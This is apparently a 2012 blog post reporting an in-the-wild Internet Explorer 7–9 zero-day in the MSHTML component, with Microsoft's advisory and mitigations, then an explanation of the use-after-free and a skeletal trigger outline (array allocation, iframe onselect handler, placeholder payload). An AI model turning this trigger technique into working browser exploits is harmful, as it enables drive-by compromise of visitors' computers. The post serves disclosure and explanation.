According to ComputerWorld, attackers have begun exploiting a new zero-day vulnerability in Microsoft’s Internet Explorer web browser. The vulnerability allows hackers to hijack Windows PCs that browse to malicious or compromised websites. The bug can be exploited in IE 7, IE 8, IE 9 (but not IE 10) allowing access to Windows XP, Vista, and Windows 7 based computers. Windows 8 computers are unaffected. Computerworld explained that the exploit was discovered by a Metasploit tool contributing programmer.
“Frequent Metasploit contributor Eric Romang stumbled upon the IE exploit when he probed one of the servers he claimed was operated by the “Nitro” hacker gang, which used a zero-day in Oracle’s Java to compromise PCs last month.”
I will update this page as new details are discovered. UPDATE (9/18/12): Microsoft issued a security advisory confirming the in-the-wild exploit. They are working on a fix. The bug will be rated “critical”, their highest threat ranking.
“Until a patch is available, Microsoft recommended that users block attacks with EMET 3.0 (Exploit Mitigation Experience Toolkit), boosting IE’s security zone settings to “high,” and configuring the browser to display a warning before executing scripts.”
How the hack works
The exploit is possible due to an unpatched bug in the MSHTML component of Internet Explorer. The MSHTML component is a part of the browser stack and is responsible for parsing HTML and CSS and rendering.
The exploit code adds a onSelect() handler too, that will trigger when the execCommand(“selectAll”) fires. This onSelect() handler contains exploit code to execute when the execCommand(“selectAll”) is fired on page load. The exploit code begins with a document.write(“X”) statement. Apparently this statement causes Internet Explorer to drop the memory that was allocated to an array. This memory can then be overwritten with anything the hacker wishes to use.
The exploit in the wild has additional code to obfuscate the exploit code.
Sample hack and exploit code below:
Contents of parent page
Begin by allocating memory for an array.
var arrr = new Array();
arrr = window.document.createElement(“img”);
arrr[“src”] = “L”;
Contents of <iframe> page
On page load, fire function to select all text. Add onSelect() handler to overwrite memory when all the text is programmatically selected.
parent.arrr.src=”EXPLOIT CODE HERE”;
<body onload=’funcSelectAll();’ onselect=’funcOverwriteMemory()’>